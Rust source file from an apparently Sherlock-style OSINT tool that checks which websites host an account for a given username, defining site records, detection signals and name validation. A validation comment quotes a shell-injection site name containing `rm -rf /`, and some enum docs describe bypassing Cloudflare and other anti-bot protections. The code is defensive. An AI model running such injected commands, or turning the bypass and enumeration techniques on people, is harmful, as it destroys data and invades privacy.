Skip to main content

adler_core/
site.rs

1//! Site definitions and the multi-signal detection model.
2//!
3//! A site is a target URL plus a list of [`Signal`]s. Each signal is an
4//! independent rule that, when triggered against a response, votes either
5//! for the account existing ([`SignalVerdict::Found`]) or not
6//! ([`SignalVerdict::NotFound`]). Non-triggering signals stay silent
7//! ([`SignalVerdict::Ambiguous`]).
8//!
9//! Aggregation is **negative-priority**: if any signal votes
10//! [`SignalVerdict::NotFound`] the verdict is [`MatchKind::NotFound`];
11//! otherwise if any votes [`SignalVerdict::Found`] it is
12//! [`MatchKind::Found`]; with no votes at all it is
13//! [`MatchKind::Uncertain`].
14//!
15//! A `NotFound` vote wins over a `Found` vote because negative signals are
16//! specific (an exact "user not found" message, a 404, a login redirect)
17//! while a bare `200 OK` is weak positive evidence. This matches how
18//! Sherlock-style detectors work: a site that always returns 200 and only
19//! differentiates via an error string is correctly read as `NotFound` when
20//! that string is present, even though the 200 also satisfies a
21//! `StatusFound` signal.
22
23use std::fmt;
24
25use serde::{Deserialize, Serialize};
26
27use crate::access::AccessPolicy;
28use crate::check::MatchKind;
29use crate::error::{Error, Result};
30use crate::username::Username;
31
/// One site we can probe for the existence of an account.
///
/// Most fields are optional in the source JSON (`#[serde(default)]`) and
/// are omitted again on serialisation while they hold their default value.
/// Invariants the type system cannot express are checked by
/// [`Site::validate`].
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Site {
    /// Human-readable site name. Doubles as the stable filter key
    /// (case-insensitive) used by CLI `--only` / `--exclude`.
    /// [`Site::validate`] requires it to be non-blank, at most
    /// `NAME_MAX_LEN` bytes long, and limited to a shell/CSV-safe
    /// character set.
    pub name: String,
    /// URL template containing a `{username}` placeholder.
    pub url: UrlTemplate,
    /// Ordered list of detection signals. Aggregated per the type-level docs.
    /// Optional in source JSON when [`Site::engine`] is set — the engine's
    /// signals are inherited at load time. After
    /// [`crate::Registry`] resolution this vec is always non-empty (or the
    /// site fails `validate`).
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// One or more usernames known to exist on this site. Consumed by
    /// `adler doctor` to verify the signal list still reports `Found`
    /// for a real account. Accepts either a single string or an array
    /// of strings in JSON; the doctor probes each in declaration order
    /// and passes the present-check if **any** one of them resolves to
    /// `Found`. Listing several is defensive — brand accounts or other
    /// users that the site special-cases (e.g. Instagram's own
    /// `instagram` account) shouldn't false-fail the whole site.
    /// [`Site::validate`] rejects an empty list and blank entries.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_present: Option<KnownPresent>,
    /// Username known to *not* exist on this site (optional). When omitted,
    /// the doctor generates a random nonsense username instead.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub known_absent: Option<String>,
    /// Optional CSS-selector rules for pulling profile fields (name, bio,
    /// avatar, …) out of a `Found` page. Only applied under `--enrich`.
    /// [`Site::validate`] rejects a blank field name or a selector that
    /// does not parse.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub extract: Vec<Extractor>,
    /// Free-form classification tags for scanning a subset of the registry,
    /// e.g. `"social"`, `"dev"`, `"region:ru"`. Matched by CLI `--tag`.
    /// A site with no tags is universal (included unless a `--tag` filter
    /// excludes it). Conventionally lowercase; `axis:value` is just a naming
    /// convention, not enforced. Blank tags are rejected by
    /// [`Site::validate`].
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub tags: Vec<String>,
    /// Extra HTTP headers to send with the probe (e.g.
    /// `{"X-IG-App-ID": "936619743392459"}` to unlock Instagram's
    /// `web_profile_info` endpoint, or a custom `User-Agent`). Browser
    /// backends apply them via `Network.setExtraHTTPHeaders` before
    /// navigation; the raw-HTTP path doesn't read this yet.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Optional regular expression describing usernames a site will
    /// accept. When set and the scanned username doesn't match, the
    /// site is skipped (the outcome is reported as `Uncertain` with
    /// reason `UsernameNotAllowed`, without issuing any HTTP request).
    /// Saves work AND avoids the false-positive class where a site
    /// 404s on illegal usernames in ways our signal can't tell apart
    /// from a missing account.
    ///
    /// Imported from Sherlock's `regexCheck` field; 95+ sites
    /// upstream carry one (length bounds, character classes, etc.).
    /// [`Site::validate`] compiles the pattern with `regex::Regex` at
    /// load time. A pattern that does not compile (e.g. one relying on
    /// look-around, which the `regex` crate does not support) does
    /// **not** reject the site: the failure is logged at DEBUG and the
    /// username gate is disabled for this site.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
    /// Name of a shared [`Engine`] this site inherits from (e.g.
    /// `"Discourse"`, `"vBulletin"`). Forum-software platforms host
    /// thousands of instances with identical detection signatures;
    /// defining the signature once on an engine and inheriting it
    /// keeps the registry small and the cost of a platform-wide
    /// HTML change one fix instead of hundreds.
    ///
    /// At registry-load time the engine fields are merged *under* the
    /// site's own — anything the site declares explicitly (`signals`,
    /// `request_headers`, `regex_check`) wins on
    /// conflict; anything left empty / unset is filled from the
    /// engine. An `engine: "X"` referring to a non-existent X is a
    /// load-time error.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub engine: Option<String>,
    /// Characters the site silently drops from the username server-side
    /// before matching — `john.doe` and `johndoe` resolve to the same
    /// account on a site that lists `strip_bad_char: "."`. We pre-strip
    /// at probe time so the URL we issue matches the canonical form
    /// the site uses, avoiding a false `NotFound` on a benign
    /// punctuation variant. Mirrors `WhatsMyName`'s field of the same
    /// name; carried verbatim through `scripts/import_whatsmyname.py`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub strip_bad_char: Option<String>,
    /// HTTP method used to probe this site. Defaults to GET — the vast
    /// majority of sites are GET-probed. A few (Anilist's GraphQL API,
    /// some Discord/Holopin endpoints) only answer to POST.
    #[serde(default, skip_serializing_if = "is_default_method")]
    pub request_method: HttpMethod,
    /// Request body to send when [`Site::request_method`] is POST. The
    /// literal `{username}` placeholder is substituted with the probe
    /// username (same as URL templates). For GraphQL endpoints this
    /// is typically the JSON `{"query":"...","variables":{"name":"{username}"}}`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub request_body: Option<String>,
    /// Specific anti-bot mechanisms the site is known to deploy. A
    /// richer alternative to the flat `bot-protected` tag — knowing
    /// *which* protection a site uses lets future routing pick the
    /// right backend (`Cloudflare` → cloudscraper-style bypass,
    /// `CfFirewall` → full browser, `UserAuth` → skip, …) instead
    /// of the all-or-nothing `bot-protected` decision.
    ///
    /// Independent of [`Site::tags`]: the existing `bot-protected`
    /// tag stays as a back-compat shorthand and routes through the
    /// browser backend exactly as before. When this vector is
    /// non-empty Adler also treats the site as bot-protected
    /// regardless of the tag.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub protection: Vec<ProtectionKind>,
    /// Disable the site without removing it from the registry.
    /// Disabled sites are skipped by [`crate::Registry::filter`] —
    /// they don't get probed, don't appear in `--list-sites`, and
    /// don't count toward the doctor's tally. Useful for parking
    /// known-broken entries with a reason comment instead of
    /// deleting them outright, so a future contributor can re-enable
    /// the entry by flipping the flag once they've authored a
    /// working signature.
    #[serde(default, skip_serializing_if = "std::ops::Not::not")]
    pub disabled: bool,
    /// Free-form annotation explaining why a [`Site::disabled`] entry
    /// was parked. The Rust runtime doesn't act on it — the JSON
    /// loader, scan path and doctor all just look at `disabled` — but
    /// downstream tooling (`scripts/doctor_aggregate.py`, ad-hoc
    /// audits) and human maintainers reading `sites.json` directly
    /// rely on it to tell categories apart at-a-glance:
    /// `duplicate of <canonical>`, `Honest Limits: …`, `doctor: 3+
    /// consecutive structural failures`, etc. Optional; only meaningful
    /// when `disabled` is also `true`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub disabled_reason: Option<String>,
    /// Canonical-source link for mirror-style sites. When a site is
    /// a mirror of another (e.g. Nitter ↔ Twitter, Invidious ↔
    /// `YouTube`), `source` carries the name of the primary site this
    /// one mirrors. Lets future UX surface "Twitter is offline,
    /// here's the same account on Nitter" without hand-curated
    /// linkage. Empty / `None` for canonical sites and sites with
    /// no known mirror relationship.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub source: Option<String>,
    /// Approximate popularity rank — lower numbers are more popular.
    /// Used by `adler --top N` as a rank ceiling (`popularity <= N`),
    /// useful for fast checks of high-signal targets. Ranks are curated,
    /// not derived from traffic data: the seed set covers well-known
    /// OSINT-relevant sites where most users have accounts. Sites
    /// without a rank are skipped by `--top N`.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub popularity: Option<u32>,
    /// Egress requirement for reaching this site — country and/or IP
    /// type the probe must exit from (see [`AccessPolicy`]). Default
    /// (empty) means no special routing: the request uses the client's
    /// default egress. When constrained and no configured egress fits,
    /// the probe is reported `Uncertain(GeoUnavailable)` rather than
    /// fetched from the wrong location.
    #[serde(default, skip_serializing_if = "AccessPolicy::is_default")]
    pub access: AccessPolicy,
}
190
/// A specific anti-bot mechanism a site is known to deploy. Used to
/// route probes to the right backend (raw HTTP, cloudscraper, full
/// browser) and to inform users what blocks reliable detection.
///
/// Variants are (de)serialised in kebab-case, e.g. `"cf-js-challenge"`
/// or `"tls-fingerprint"`. The enum is `#[non_exhaustive]`, so new
/// mechanisms can be added without breaking downstream matches.
#[derive(Debug, Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "kebab-case")]
#[non_exhaustive]
pub enum ProtectionKind {
    /// Standard Cloudflare WAF — challenge pages, `cf_clearance`
    /// cookie. Bypassable by cloudscraper-style HTTP-level solvers
    /// (e.g. `FlareSolverr`) without a full browser.
    Cloudflare,
    /// AWS `CloudFront` edge protection. Often UA-strictness only.
    Cloudfront,
    /// `DDoS-Guard` (used by some Russian/CIS hosts). Similar
    /// challenge model to Cloudflare.
    DdosGuard,
    /// Cloudflare's JS-challenge ("I am under attack" mode).
    /// Needs a JS-executing backend.
    CfJsChallenge,
    /// Cloudflare's WAF firewall blocking by signature, requiring
    /// a real browser fingerprint to clear.
    CfFirewall,
    /// JA3/JA4 TLS-fingerprint matching (servers that classify the
    /// client by its TLS handshake shape, not its UA).
    TlsFingerprint,
    /// `Anubis` proof-of-work challenge. Used by codeberg + a
    /// growing number of FOSS projects to discourage scraping.
    Anubis,
    /// Generic captcha challenge (hCaptcha, reCAPTCHA, …). Almost
    /// always blocking — `Uncertain` is the honest answer.
    Captcha,
    /// Trivial UA-strictness: rejects unknown User-Agent strings
    /// but lets through a real-browser UA. Cheapest to bypass.
    UserAgent,
    /// Endpoint requires authentication; no anonymous probe path
    /// exists. Practically unscrapable for OSINT.
    UserAuth,
}
229
/// HTTP method used to probe a site. Only GET and POST are supported.
///
/// (De)serialised in upper case (`"GET"` / `"POST"`). The `Default`
/// is [`HttpMethod::Get`], which is also the value serde fills in when
/// a site omits `request_method`.
#[derive(Debug, Clone, Copy, Default, PartialEq, Eq, Serialize, Deserialize)]
#[serde(rename_all = "UPPERCASE")]
pub enum HttpMethod {
    /// Standard GET — the default for ~99% of sites in the registry.
    #[default]
    Get,
    /// POST — for API endpoints that only differentiate accounts via a
    /// body payload (GraphQL queries, form submissions). Pair with
    /// [`Site::request_body`].
    Post,
}
242
243/// serde's `skip_serializing_if` callback contract requires a
244/// reference, so the by-value lint on a 1-byte type doesn't apply.
245#[allow(clippy::trivially_copy_pass_by_ref)]
246fn is_default_method(m: &HttpMethod) -> bool {
247    matches!(m, HttpMethod::Get)
248}
249
/// Shared detection signature template for a family of sites that
/// run the same forum / blog / wiki software (Discourse, vBulletin,
/// `XenForo`, `MediaWiki`, …). Referenced from [`Site::engine`].
///
/// Engines carry the same kinds of fields as a [`Site`] does (just
/// the inheritable ones — there's no per-engine `url`, that comes
/// from the site itself). At registry load, the engine's fields
/// are merged *under* each referring site's own fields: site wins
/// on conflict. The merge itself is implemented by
/// [`Engine::merge_into`].
#[derive(Debug, Clone, Default, Serialize, Deserialize)]
#[non_exhaustive]
pub struct Engine {
    /// Default detection signals for sites of this family.
    /// Inherited only when the site itself declares no `signals`.
    #[serde(default, skip_serializing_if = "Vec::is_empty")]
    pub signals: Vec<Signal>,
    /// Default extra HTTP headers (e.g. a User-Agent that the
    /// platform accepts where the browser default gets blocked).
    /// Merged with the site's own headers; site wins per-key.
    #[serde(default, skip_serializing_if = "std::collections::BTreeMap::is_empty")]
    pub request_headers: std::collections::BTreeMap<String, String>,
    /// Default username-validity regex inherited only when the site
    /// itself doesn't declare one. A pattern that fails to compile is
    /// logged at DEBUG by [`Engine::validate`] rather than rejected.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub regex_check: Option<String>,
}
276
277impl Engine {
278    /// Compile-check the engine's own constraints — the inheritable
279    /// fields are subject to the same validation as a site's would
280    /// be.
281    ///
282    /// # Errors
283    /// Returns [`Error::InvalidSite`] when the engine name is
284    /// empty, a signal carries an empty marker, or any other
285    /// constraint a [`Site::validate`] would also flag.
286    pub fn validate(&self, name: &str) -> Result<()> {
287        if name.trim().is_empty() {
288            return Err(Error::InvalidSite {
289                reason: "engine name is empty".into(),
290            });
291        }
292        for signal in &self.signals {
293            signal.validate().map_err(|reason| Error::InvalidSite {
294                reason: format!("engine {name:?}: {reason}"),
295            })?;
296        }
297        if let Some(pat) = &self.regex_check {
298            if let Err(err) = regex::Regex::new(pat) {
299                // The Rust `regex` crate refuses look-around for DoS
300                // reasons; some upstream registries (Sherlock, WMN)
301                // ship patterns that need it. Downgraded from WARN to
302                // DEBUG: it's a known structural limit, the probe
303                // path falls back gracefully, and the noise dominated
304                // CLI startup.
305                tracing::debug!(
306                    engine = %name, pattern = %pat, error = %err,
307                    "engine regex_check did not compile; gate disabled for inheriting sites",
308                );
309            }
310        }
311        Ok(())
312    }
313
314    /// Fill the inheritable empty / unset fields of `site` from
315    /// this engine. Site fields are authoritative: if the site has
316    /// any signals at all, no engine signals are merged in.
317    /// `request_headers` merge per-key (site wins on per-key
318    /// conflict).
319    pub fn merge_into(&self, site: &mut Site) {
320        if site.signals.is_empty() {
321            site.signals.clone_from(&self.signals);
322        }
323        for (k, v) in &self.request_headers {
324            site.request_headers
325                .entry(k.clone())
326                .or_insert_with(|| v.clone());
327        }
328        if site.regex_check.is_none() {
329            site.regex_check.clone_from(&self.regex_check);
330        }
331    }
332}
333
/// Known-present declaration on a [`Site`].
///
/// In JSON this is `untagged`: a plain string `"torvalds"` deserialises
/// into [`KnownPresent::Single`], an array `["torvalds", "leomessi"]`
/// into [`KnownPresent::Multiple`]. Serialisation preserves the form
/// the site was authored with, so single-username entries stay
/// compact.
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(untagged)]
#[non_exhaustive]
pub enum KnownPresent {
    /// Exactly one candidate username.
    Single(String),
    /// A list of candidate usernames — conventionally two or more,
    /// though any JSON array (including an empty one, which
    /// [`Site::validate`] rejects) lands here. Doctor passes if any
    /// resolve to `Found`.
    Multiple(Vec<String>),
}
351
352impl KnownPresent {
353    /// View all candidate usernames as a slice, in declaration order.
354    /// Always non-empty for `Single`; may be empty for a hand-authored
355    /// `Multiple([])` (validation rejects that).
356    pub fn as_slice(&self) -> &[String] {
357        match self {
358            Self::Single(s) => std::slice::from_ref(s),
359            Self::Multiple(v) => v.as_slice(),
360        }
361    }
362
363    /// Primary candidate — the first declared username. `Single`
364    /// always has one; `Multiple` may be empty if a contributor wrote
365    /// `[]` (caught by [`Site::validate`]).
366    pub fn primary(&self) -> Option<&str> {
367        self.as_slice().first().map(String::as_str)
368    }
369}
370
371impl From<&str> for KnownPresent {
372    fn from(s: &str) -> Self {
373        Self::Single(s.to_owned())
374    }
375}
376
377impl From<String> for KnownPresent {
378    fn from(s: String) -> Self {
379        Self::Single(s)
380    }
381}
382
/// Upper bound on a site name's length. Names appear in CLI output,
/// CSV columns, and the validate-sites.yml workflow's run-summary
/// table — keeping them short avoids both UI breakage and
/// pathological CI artefacts.
///
/// [`Site::validate`] compares this against `str::len`, i.e. the
/// length in bytes. For names that pass the ASCII-only safe-character
/// check, bytes and characters coincide.
const NAME_MAX_LEN: usize = 80;
388
/// Decide whether `name` is safe to interpolate into shell, CSV, and
/// CLI argument contexts.
///
/// Mirrors the JSON Schema pattern `^[\w][\w .()!/+-]*$` with `\w`
/// read as ASCII letters, digits and `_`: the first character must be
/// a word character, every later one a word character, a space, or one
/// of `.()!/+-`. An empty name is never safe.
fn is_safe_site_name(name: &str) -> bool {
    // ASCII-only equivalent of the schema's `\w`.
    let is_word = |c: char| c == '_' || c.is_ascii_alphanumeric();
    // Extra characters tolerated anywhere but the first position.
    let is_punctuation = |c: char| " .()!/+-".contains(c);

    let mut rest = name.chars();
    match rest.next() {
        Some(first) if is_word(first) => rest.all(|c| is_word(c) || is_punctuation(c)),
        _ => false,
    }
}
405
/// A rule for extracting one profile field from a page.
///
/// Listed under [`Site::extract`]. [`Site::validate`] rejects a rule
/// whose `field` is blank or whose `selector` fails to parse as a CSS
/// selector.
#[derive(Debug, Clone, Serialize, Deserialize)]
pub struct Extractor {
    /// Output field name, e.g. `"avatar"`, `"bio"`, `"name"`.
    pub field: String,
    /// CSS selector locating the element.
    pub selector: String,
    /// Attribute to read (e.g. `"src"`, `"content"`). When omitted, the
    /// element's trimmed text content is used.
    #[serde(default, skip_serializing_if = "Option::is_none")]
    pub attr: Option<String>,
}
418
419impl Site {
420    /// Render the site URL for a given username.
421    ///
422    /// If the site declares [`strip_bad_char`](Site::strip_bad_char),
423    /// those characters are removed from `username` before
424    /// substitution — so a `john.doe` probe against a site that
425    /// lists `strip_bad_char: "."` actually hits the URL for
426    /// `johndoe`, matching the canonical form the site stores
427    /// internally.
428    pub fn url_for(&self, username: &Username) -> String {
429        self.url.substitute(&self.canonical_username(username))
430    }
431
432    /// Render the username in the canonical form this site expects.
433    ///
434    /// This mirrors [`Site::url_for`] without tying callers to URL
435    /// substitution, so detection signals can compare the response body
436    /// against the same username form that was actually probed.
437    pub(crate) fn canonical_username(&self, username: &Username) -> String {
438        let raw = username.as_str();
439        match self.strip_bad_char.as_deref() {
440            Some(chars) if !chars.is_empty() && raw.chars().any(|c| chars.contains(c)) => {
441                raw.chars().filter(|c| !chars.contains(*c)).collect()
442            }
443            _ => raw.to_owned(),
444        }
445    }
446
447    /// Validate semantic invariants the type system can't enforce
448    /// (empty signals list, empty markers, empty status code sets).
449    pub fn validate(&self) -> Result<()> {
450        if self.name.trim().is_empty() {
451            return Err(Error::InvalidSite {
452                reason: "site name is empty".into(),
453            });
454        }
455        // Site names doubled as shell-interpolation values in the
456        // `validate-sites.yml` PR gate; an unsanitised name like
457        // `Foo"; rm -rf /; #` would have broken out of `"$name"`
458        // quoting and run arbitrary commands on the runner. Both the
459        // JSON Schema and this Rust loader enforce a safe character
460        // class (word chars plus a few visual punctuation marks) at
461        // every entry point.
462        if self.name.len() > NAME_MAX_LEN {
463            return Err(Error::InvalidSite {
464                reason: format!(
465                    "site name longer than {NAME_MAX_LEN} chars: {:?}",
466                    self.name
467                ),
468            });
469        }
470        if !is_safe_site_name(&self.name) {
471            return Err(Error::InvalidSite {
472                reason: format!(
473                    "site name {:?} contains characters outside the allowed \
474                     set (word chars, space, `.()!/+-`)",
475                    self.name
476                ),
477            });
478        }
479        if self.signals.is_empty() {
480            return Err(Error::InvalidSite {
481                reason: format!("site {:?}: signals list is empty", self.name),
482            });
483        }
484        for signal in &self.signals {
485            signal.validate().map_err(|reason| Error::InvalidSite {
486                reason: format!("site {:?}: {reason}", self.name),
487            })?;
488        }
489        for extractor in &self.extract {
490            if extractor.field.trim().is_empty() {
491                return Err(Error::InvalidSite {
492                    reason: format!("site {:?}: extractor has an empty field name", self.name),
493                });
494            }
495            if scraper::Selector::parse(&extractor.selector).is_err() {
496                return Err(Error::InvalidSite {
497                    reason: format!(
498                        "site {:?}: invalid CSS selector {:?} for field {:?}",
499                        self.name, extractor.selector, extractor.field
500                    ),
501                });
502            }
503        }
504        if let Some(pat) = &self.regex_check {
505            if let Err(err) = regex::Regex::new(pat) {
506                // Sherlock's regexes occasionally use lookarounds
507                // (e.g. `(?![.-])`), which the Rust `regex` crate
508                // doesn't support — it's a true regular-language
509                // engine for performance + DoS safety. Rather than
510                // reject the whole site over a username-gate the
511                // probe path will simply skip and let the site keep
512                // working at the cost of one wasted probe per
513                // illegal username. Logged at DEBUG (not WARN) — it's
514                // a known structural limit, ~8 sites in the embedded
515                // registry need look-around. The noise dominated CLI
516                // startup; set `ADLER_LOG=debug` to see them again.
517                tracing::debug!(
518                    site = %self.name, pattern = %pat, error = %err,
519                    "regex_check did not compile; username-gate disabled for this site",
520                );
521            }
522        }
523        if let Some(kp) = &self.known_present {
524            if kp.as_slice().is_empty() {
525                return Err(Error::InvalidSite {
526                    reason: format!("site {:?}: known_present is an empty list", self.name),
527                });
528            }
529            for name in kp.as_slice() {
530                if name.trim().is_empty() {
531                    return Err(Error::InvalidSite {
532                        reason: format!(
533                            "site {:?}: known_present contains an empty username",
534                            self.name
535                        ),
536                    });
537                }
538            }
539        }
540        for tag in &self.tags {
541            if tag.trim().is_empty() {
542                return Err(Error::InvalidSite {
543                    reason: format!("site {:?}: tag is empty", self.name),
544                });
545            }
546        }
547        Ok(())
548    }
549}
550
/// URL template containing a `{username}` placeholder.
///
/// Validated at construction: must contain the placeholder and start with
/// `http://` or `https://`. The inner string is private, so the only ways
/// to obtain a value are [`UrlTemplate::new`] and deserialisation, which
/// goes through the same check.
#[derive(Debug, Clone, PartialEq, Eq)]
pub struct UrlTemplate(String);
557
/// Literal marker inside a [`UrlTemplate`] that is replaced with the
/// probe username when the URL is rendered.
const PLACEHOLDER: &str = "{username}";
559
560impl UrlTemplate {
561    /// Build a template, validating placeholder and scheme.
562    pub fn new(template: impl Into<String>) -> Result<Self> {
563        let t = template.into();
564        if !t.contains(PLACEHOLDER) {
565            return Err(Error::InvalidSite {
566                reason: format!("url template missing {PLACEHOLDER} placeholder: {t:?}"),
567            });
568        }
569        if !(t.starts_with("http://") || t.starts_with("https://")) {
570            return Err(Error::InvalidSite {
571                reason: format!("url template must start with http(s)://: {t:?}"),
572            });
573        }
574        Ok(Self(t))
575    }
576
577    fn substitute(&self, username: &str) -> String {
578        self.0.replace(PLACEHOLDER, username)
579    }
580
581    /// Borrow the raw template (with placeholder).
582    pub fn as_str(&self) -> &str {
583        &self.0
584    }
585}
586
587impl fmt::Display for UrlTemplate {
588    fn fmt(&self, f: &mut fmt::Formatter<'_>) -> fmt::Result {
589        f.write_str(&self.0)
590    }
591}
592
593impl Serialize for UrlTemplate {
594    fn serialize<S: serde::Serializer>(&self, s: S) -> std::result::Result<S::Ok, S::Error> {
595        self.0.serialize(s)
596    }
597}
598
599impl<'de> Deserialize<'de> for UrlTemplate {
600    fn deserialize<D: serde::Deserializer<'de>>(d: D) -> std::result::Result<Self, D::Error> {
601        let raw = String::deserialize(d)?;
602        Self::new(raw).map_err(serde::de::Error::custom)
603    }
604}
605
/// A single piece of evidence about whether an account exists.
///
/// Signals are tagged in JSON by their `kind`, written in snake_case —
/// e.g. `{"kind": "status_found", "codes": [200]}`. New variants will
/// land for Phase 2 length-baseline scoring; the enum is
/// `#[non_exhaustive]` so adding variants is not a breaking change.
///
/// A signal whose trigger condition is not met casts no vote (see
/// `Signal::evaluate`).
#[derive(Debug, Clone, Serialize, Deserialize)]
#[serde(tag = "kind", rename_all = "snake_case")]
#[non_exhaustive]
pub enum Signal {
    /// Votes **`Found`** when the response status is in `codes`.
    StatusFound {
        /// Status codes that vote for existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`NotFound`** when the response status is in `codes`.
    StatusNotFound {
        /// Status codes that vote for non-existence. Must be non-empty.
        codes: Vec<u16>,
    },
    /// Votes **`Found`** when the response body contains `text`.
    BodyPresent {
        /// Substring whose appearance votes for existence. Must be non-empty.
        text: String,
    },
    /// Votes **`Found`** when the response body contains `text` after
    /// substituting `{username}` with the site's canonical username.
    BodyUsername {
        /// Username-confirming body marker. Must be non-empty and must
        /// contain the literal `{username}` placeholder.
        text: String,
    },
    /// Votes **`NotFound`** when the response body contains `text`.
    BodyAbsent {
        /// Substring whose appearance votes for non-existence (e.g.
        /// `"Profile not found"`). Must be non-empty.
        text: String,
    },
    /// Votes **`NotFound`** when the final URL (post-redirect) contains
    /// `fragment`.
    RedirectAbsent {
        /// Substring that, when present in the final URL, indicates the
        /// account is missing (typically `"/login"` or `"/404"`). Must be
        /// non-empty.
        fragment: String,
    },
}
652
/// Probe data extracted from an HTTP response, fed to each [`Signal`].
///
/// Internal detection plumbing — not part of the public API. All text
/// fields are borrowed for `'a`; the struct owns nothing.
#[derive(Debug)]
pub(crate) struct Probe<'a> {
    /// HTTP status code. Compared against the `codes` of status signals.
    pub(crate) status: u16,
    /// Final URL after redirects. Searched by `RedirectAbsent`.
    pub(crate) final_url: &'a str,
    /// Decoded response body. Empty string when no body-using signal is configured.
    pub(crate) body: &'a str,
    /// Username in the canonical form used for this site. Substituted
    /// into the marker of a `BodyUsername` signal.
    pub(crate) username: &'a str,
}
667
/// What one signal concluded after looking at a probe.
///
/// Per the module docs, votes are aggregated with negative priority:
/// any `NotFound` outweighs any number of `Found` votes, and
/// `Ambiguous` counts as no vote at all.
#[derive(Debug, Clone, Copy, PartialEq, Eq)]
pub(crate) enum SignalVerdict {
    /// This signal votes that the account exists.
    Found,
    /// This signal votes that the account does not exist.
    NotFound,
    /// This signal had nothing to say (its trigger condition didn't match).
    Ambiguous,
}
678
679impl Signal {
680    /// True if this signal needs to inspect the response body. Used by the
681    /// client to skip body reads when no signal requires them.
682    pub(crate) fn needs_body(&self) -> bool {
683        matches!(
684            self,
685            Self::BodyPresent { .. } | Self::BodyUsername { .. } | Self::BodyAbsent { .. }
686        )
687    }
688
689    /// Evaluate this signal against a probe and produce a vote.
690    pub(crate) fn evaluate(&self, probe: &Probe<'_>) -> SignalVerdict {
691        match self {
692            Self::StatusFound { codes } => {
693                if codes.contains(&probe.status) {
694                    SignalVerdict::Found
695                } else {
696                    SignalVerdict::Ambiguous
697                }
698            }
699            Self::StatusNotFound { codes } => {
700                if codes.contains(&probe.status) {
701                    SignalVerdict::NotFound
702                } else {
703                    SignalVerdict::Ambiguous
704                }
705            }
706            Self::BodyPresent { text } => {
707                if probe.body.contains(text.as_str()) {
708                    SignalVerdict::Found
709                } else {
710                    SignalVerdict::Ambiguous
711                }
712            }
713            Self::BodyUsername { text } => {
714                if probe
715                    .body
716                    .contains(render_username_marker(text, probe.username).as_str())
717                {
718                    SignalVerdict::Found
719                } else {
720                    SignalVerdict::Ambiguous
721                }
722            }
723            Self::BodyAbsent { text } => {
724                if probe.body.contains(text.as_str()) {
725                    SignalVerdict::NotFound
726                } else {
727                    SignalVerdict::Ambiguous
728                }
729            }
730            Self::RedirectAbsent { fragment } => {
731                if probe.final_url.contains(fragment.as_str()) {
732                    SignalVerdict::NotFound
733                } else {
734                    SignalVerdict::Ambiguous
735                }
736            }
737        }
738    }
739
740    /// Human-readable description of why this signal fired against `probe`,
741    /// for verdict explainability. Only meaningful for a signal that voted
742    /// (i.e. didn't return [`SignalVerdict::Ambiguous`]); the caller filters.
743    pub(crate) fn describe_match(&self, probe: &Probe<'_>) -> String {
744        match self {
745            Self::StatusFound { .. } => format!("HTTP {} (status_found)", probe.status),
746            Self::StatusNotFound { .. } => format!("HTTP {} (status_not_found)", probe.status),
747            Self::BodyPresent { text } => format!("body contains {text:?} (body_present)"),
748            Self::BodyUsername { text } => format!(
749                "body contains {:?} (body_username)",
750                render_username_marker(text, probe.username)
751            ),
752            Self::BodyAbsent { text } => format!("body contains {text:?} (body_absent)"),
753            Self::RedirectAbsent { fragment } => {
754                format!("final URL contains {fragment:?} (redirect_absent)")
755            }
756        }
757    }
758
759    /// Whether this signal confirms the concrete username for the current
760    /// probe instead of only reporting a generic positive match.
761    pub(crate) const fn confirms_username(&self) -> bool {
762        matches!(self, Self::BodyUsername { .. })
763    }
764
765    fn validate(&self) -> std::result::Result<(), String> {
766        match self {
767            Self::StatusFound { codes } | Self::StatusNotFound { codes } => {
768                if codes.is_empty() {
769                    return Err("status signal codes list is empty".into());
770                }
771            }
772            Self::BodyPresent { text } | Self::BodyAbsent { text } => {
773                if text.is_empty() {
774                    return Err("body signal text is empty".into());
775                }
776            }
777            Self::BodyUsername { text } => {
778                if text.is_empty() {
779                    return Err("body username signal text is empty".into());
780                }
781                if !text.contains(PLACEHOLDER) {
782                    return Err(format!(
783                        "body username signal text missing {PLACEHOLDER} placeholder"
784                    ));
785                }
786            }
787            Self::RedirectAbsent { fragment } => {
788                if fragment.is_empty() {
789                    return Err("redirect signal fragment is empty".into());
790                }
791            }
792        }
793        Ok(())
794    }
795}
796
797fn render_username_marker(template: &str, username: &str) -> String {
798    template.replace(PLACEHOLDER, username)
799}
800
801/// Aggregate per-signal verdicts into a final [`MatchKind`].
802///
803/// Negative-priority counting: any `NotFound` vote → `NotFound`; otherwise
804/// any `Found` vote → `Found`; no votes at all → `Uncertain`. See the module
805/// docs for why a `NotFound` vote outranks a `Found` vote.
806pub(crate) fn aggregate<I>(verdicts: I) -> MatchKind
807where
808    I: IntoIterator<Item = SignalVerdict>,
809{
810    let mut found = false;
811    let mut not_found = false;
812    for v in verdicts {
813        match v {
814            SignalVerdict::Found => found = true,
815            SignalVerdict::NotFound => not_found = true,
816            SignalVerdict::Ambiguous => {}
817        }
818    }
819    if not_found {
820        MatchKind::NotFound
821    } else if found {
822        MatchKind::Found
823    } else {
824        MatchKind::Uncertain
825    }
826}
827
/// Unit and property tests for site validation, URL rendering, per-signal
/// evaluation and verdict aggregation.
#[cfg(test)]
mod tests {
    use super::*;

    /// Builds a site named "Example" at `https://example.com/{username}` with
    /// the given `signals` and an empty/default value for every other field.
